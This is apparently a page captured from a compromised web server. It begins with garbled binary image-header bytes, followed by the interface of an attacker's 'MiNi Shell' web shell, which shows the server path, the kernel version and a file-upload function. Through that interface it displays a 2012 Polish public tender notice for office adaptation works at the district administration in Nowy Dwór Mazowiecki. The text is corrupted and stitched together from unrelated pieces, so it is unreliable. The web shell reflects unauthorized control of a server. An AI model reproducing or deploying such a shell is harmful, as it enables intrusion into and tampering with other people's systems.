JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/243054-N-2012.html

<p class="kh_header"><b>Nowy Dwór Mazowiecki: Roboty budowlane w zakresie dostosowania pomieszczeń znajdujących się na III piętrze budynku ZRB WAM Sp. z o.o. przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim oraz w budynku Starostwa Powiatowego w Nowym Dworze Mazowieckim przy ul. Paderewskiego 1b do planowanych zmian organizacyjnych</b><br>
<b>Numer ogłoszenia: 243054 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Nowym Dworze Mazowieckim , ul. Mazowiecka 10, 05-100 Nowy Dwór Mazowiecki, woj. mazowieckie, tel. 022 7753679, 7753258, faks 022 7753679.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowodworski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w zakresie dostosowania pomieszczeń znajdujących się na III piętrze budynku ZRB WAM Sp. z o.o. przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim oraz w budynku Starostwa Powiatowego w Nowym Dworze Mazowieckim przy ul. Paderewskiego 1b do planowanych zmian organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w niniejszym postępowaniu są roboty budowlane w zakresie dostosowania pomieszczeń znajdujących się na III piętrze budynku ZRB WAM Sp. z o.o. przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim oraz w budynku Starostwa Powiatowego w Nowym Dworze Mazowieckim przy ul. Paderewskiego 1b do planowanych zmian organizacyjnych. Zakres i charakterystyka robót znaczących:
1.	Etap I - ZRB WAM Sp. z o.o., ul. Paderewskiego 6, 05 - 100 Nowy Dwór Mazowiecki: a)	przygotowanie wraz ze szpachlowaniem powierzchni pod malowanie farbami, b)	zabezpieczenie podłóg folią, c)	gruntowanie przed malowaniem, d)	dwukrotne malowanie ścian i sufitów farbami emulsyjnymi, e)	wstawienie drzwi płytowych wewnętrznych, f)	roboty w zakresie branży elektrycznej i teletechnicznej: - montaż korytek PCV i rurek winidurowych, - montaż przewodów zasilających, - montaż przewodów sieci komputerowej, - pomontażowe próby i pomiary instalacji, - montaż osprzętu; 2.	Etap II - Siedziba Starostwa Powiatowego, ul. Paderewskiego 1b, 05 - 100 Nowy Dwór Mazowiecki: a)	budowa ścianek działowych K-G, b)	dwukrotne malowanie ścian, c)	murowanie ścianek działowych, d)	kraty prętowe, e)	montaż ścianek aluminiowych, f)	montaż okien aluminiowych, g)	demontaż i montaż rolet okiennych antywłamaniowych, h)	adaptacja instalacji elektrycznej, i)	montaż ościeżnic drzwiowych z drzwiami płytowymi wewnętrznymi, j)	montaż nowego klimatyzatora, k)	montaż i demontaż klimatyzatorów, l)	roboty w zakresie branży elektrycznej i teletechnicznej: - montaż korytek PCV i rurek winidurowych, - montaż przewodów zasilających, - montaż przewodów sieci komputerowej, - pomontażowe próby i pomiary instalacji, - montaż osprzętu. Szczegółowy zakres przewidzianych do wykonania prac określają następujące dokumenty: 1.	Roboty budowlane w zakresie adaptacji pomieszczeń ZRB WAM Sp. z o.o. na III piętrze budynku przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim oraz budynku Starostwa Powiatowego w Nowym Dworze Mazowieckim przy ul. Paderewskiego 1b do planowanych zmian organizacyjnych:
a)	Plan przewidzianych do wykonania robót budowlanych - rzut: parter budynku Starostwa Powiatowego w przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 1 do SIWZ), b)	Plan przewidzianych do wykonania robót budowlanych - rzut: I piętro budynku Starostwa Powiatowego przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 2 do SIWZ), c)	Plan przewidzianych do wykonania robót budowlanych - rzut: II piętro budynku Starostwa Powiatowego przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 3 do SIWZ),
d)	Widok ścianki murowanej z oknami do obsługi klientów - Wydział Komunikacji, parter budynku Starostwa Powiatowego przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 4 do SIWZ),
e)	Przedmiar robót dotyczący adaptacji pomieszczeń ZRB WAM Sp. z o.o. na III piętrze budynku przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim oraz budynku Starostwa Powiatowego przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 5 do SIWZ),
f)	Specyfikacja techniczna wykonania i odbioru robót budowlanych polegających na dostosowaniu pomieszczeń Starostwa do planowanych zmian organizacyjnych (załącznik nr 6 do SIWZ).
g)	Specyfikacja techniczna - klimatyzator ścienny (załącznik nr 7 do SIWZ).
2.	Roboty w zakresie montażu instalacji elektrycznej oraz teletechnicznej w budynku Starostwa Powiatowego przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim: a)	Projekt rozbudowy instalacji elektrycznej i informatycznej w budynku Starostwa Powiatowego przy ul. Paderewskiego 1b - parter (załącznik nr 8 do SIWZ), b)	Projekt rozbudowy instalacji elektrycznej i informatycznej w budynku Starostwa Powiatowego przy ul. Paderewskiego 1b - I piętro (załącznik nr 9 do SIWZ), c)	Projekt rozbudowy instalacji informatycznej w budynku przy Starostwa Powiatowego przy ul. Paderewskiego 1b - II piętro (załącznik nr 10 do SIWZ), d)	Przedmiar robót w zakresie montażu instalacji elektrycznej oraz teletechnicznej w budynku przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 11 do SIWZ),e)	Specyfikacja techniczna wykonania i odbioru robót w zakresie montażu instalacji elektrycznej oraz teletechnicznej w budynku przy ul. Paderewskiego 1b w Nowym Dworze Mazowieckim (załącznik nr 12 do SIWZ).
3.	Roboty w zakresie montażu instalacji elektrycznej oraz teletechnicznej w budynku ZRB WAM Sp. z o.o. (III piętro) przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim: a)	Projekt przebiegu instalacji elektrotechnicznych w budynku ZRB WAM Sp. z o.o. (III piętro) przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim (załącznik nr 13 do SIWZ), b)	Przedmiar robót w zakresie montażu instalacji elektrycznej oraz teletechnicznej w budynku ZRB WAM Sp. z o.o. (III piętro) przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim (załącznik nr 14 do SIWZ),
c)	Specyfikacja techniczna wykonania i odbioru robót w zakresie montażu instalacji elektrycznej oraz teletechnicznej w budynku ZRB WAM Sp. z o.o. (III piętro) przy ul. Paderewskiego 6 w Nowym Dworze Mazowieckim (załącznik nr 15 do SIWZ). Uwagi: 1.	Podczas prac adaptacyjnych praca większości komórek merytorycznych Starostwa Powiatowego powinna odbywać się bez zakłóceń.
2.	W trakcie prac należy zabezpieczyć obszary robocze np. kurtynami z folii, od powierzchni biur i korytarzy. 3.	W kosztach robót należy uwzględnić wszelkie roboty zabezpieczające. 4.	Podczas realizacji robót podstawowych objętych przedmiarem należy również uwzględnić prace związane z dostosowaniem urządzeń, powierzchni sufitowych, czy też kolizji z inna infrastrukturą tak, aby prace adaptacyjne można było uznać za kompletne.
5.	Okres gwarancji jakości na wszelkie roboty objęte umową i wbudowane urządzenia oraz wyposażenie wynosi 24 miesiące licząc od dnia podpisania przez strony przyszłej umowy protokołu odbioru końcowego przedmiotu umowy.
6.	Okres rękojmi na wszelkie roboty objęte umową i wbudowane urządzenia oraz wyposażenie wynosi 36 miesięcy licząc od dnia podpisania przez strony przyszłej umowy protokołu odbioru końcowego przedmiotu umowy.
7.	O ile w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych mówi się o Inspektorze Nadzoru należy przez to rozumieć Inwestora. 
8.	Załączone do SIWZ przedmiary robót są dokumentami pomocniczymi.
9.	Zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej celem zapoznania się z terenem objętym przedmiotem zamówienia, co ułatwi prawidłowe przygotowanie oferty (ze względu na charakter pracy pracowników Zamawiającego w pomieszczeniach, w których planowane są roboty budowlane, Zamawiający wskazuje, iż Wykonawca powinien zgłosić chęć przeprowadzenia wizji lokalnej celem zapewnienia Wykonawcom pełnego dostępu do pomieszczeń objętych przedmiotem zamówienia). Koszty związane z przeprowadzeniem wizji lokalnej ponosi Wykonawca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.11.13.00-1, 45.21.00.00-2, 45.30.00.00-0, 45.31.00.00-3, 45.31.12.00-2, 45.31.40.00-1, 45.31.42.00-3, 45.31.43.00-4, 45.31.43.10-7, 45.31.43.20-0, 45.31.51.00-9, 45.31.57.00-5, 45.33.12.20-4, 45.42.11.30-4, 45.42.11.45-2, 45.42.11.47-6, 45.42.11.52-4, 45.44.21.00-8, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3.500,00 PLN, słownie: trzy tysiące pięćset złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna wykazanie przez Wykonawcę, iż dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz co najmniej jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji sieci, instalacji urządzeń elektrycznych oraz elektroenergetycznych. Zamawiający dopuszcza wykazanie się jedną osobą spełniającą oba powyższe warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Kserokopia dowodu wniesienia wadium; 2) Dokument - w szczególności pisemne zobowiązanie - potwierdzające oddanie przez podmioty trzecie do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych; 3) Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy (w przypadku gdy zasady reprezentacji Wykonawcy nie wynikają ze złożonych wraz z ofertą rejestrów), a jeżeli Wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania, podpisane przez osoby uprawnione do reprezentacji Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
2. Zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że  konieczność takich zmian wynika z wystąpienia następujących okoliczności:
1) zmiana terminu wykonania umowy  - w przypadku : 
a)	wystąpienia zjawisk związanych z działaniem siły wyższej, 
b)	opóźnienia w wyniku decyzji administracyjnych (decyzja władz publicznych, zmiana obowiązującego prawa, oczekiwanie na nieprzewidziane wcześniej konieczne wyniki ekspertyz, wyrok sądu itp.).

W przypadku wystąpienia którejkolwiek z wymienionych wyżej okoliczności w zakresie mającym wpływ na przebieg realizacji zamówienia, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny, jednak nie dłużej niż  o czas  równy okresowi przerwy, postoju lub opóźnienia.

2) Zmiana sposobu spełnienia świadczenia. Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:
a)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót.
b)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
c)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji w postaci rzutów, rysunków, opisów lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
d)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa; 
e)	konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia sprzeczności przy pomocy wykładni, w szczególności gdy sprzeczne zapisy mają równy stopień pierwszeństwa.

3) wynagrodzenia: 
a)	gdy zmianie ulegnie urzędowa stawka podatku VAT.
b)	w przypadku jego ograniczenia lub zastosowania rozwiązań zamiennych tj. takich, które nie powodując rozszerzenia zakresu przedmiotu zamówienia prowadzić będą do jego ulepszenia, usprawnienia realizacji lub do zastosowania materiałów równoważnych. 
3. Wystąpienie którejkolwiek z wymienionych w ust. 2. okoliczności nie stanowi bezwzględnego zobowiązania zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania. 
4.  Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu robót w sytuacji  której nie można było przewidzieć w chwili zawarcia umowy a nie powstałych z winy Zamawiającego ani Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowodworski.pl - zakładka: Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: Starostwo Powiatowe w Nowym Dworze Mazowieckim, ul. Mazowiecka 10, 05 - 100 Nowy Dwór Mazowiecki, pok. 109.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 11:30, miejsce: Siedziba Zamawiającego: Starostwo Powiatowe w Nowym Dworze Mazowieckim, ul. Mazowiecka 10, 05 - 100 Nowy Dwór Mazowiecki, pok. 107 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com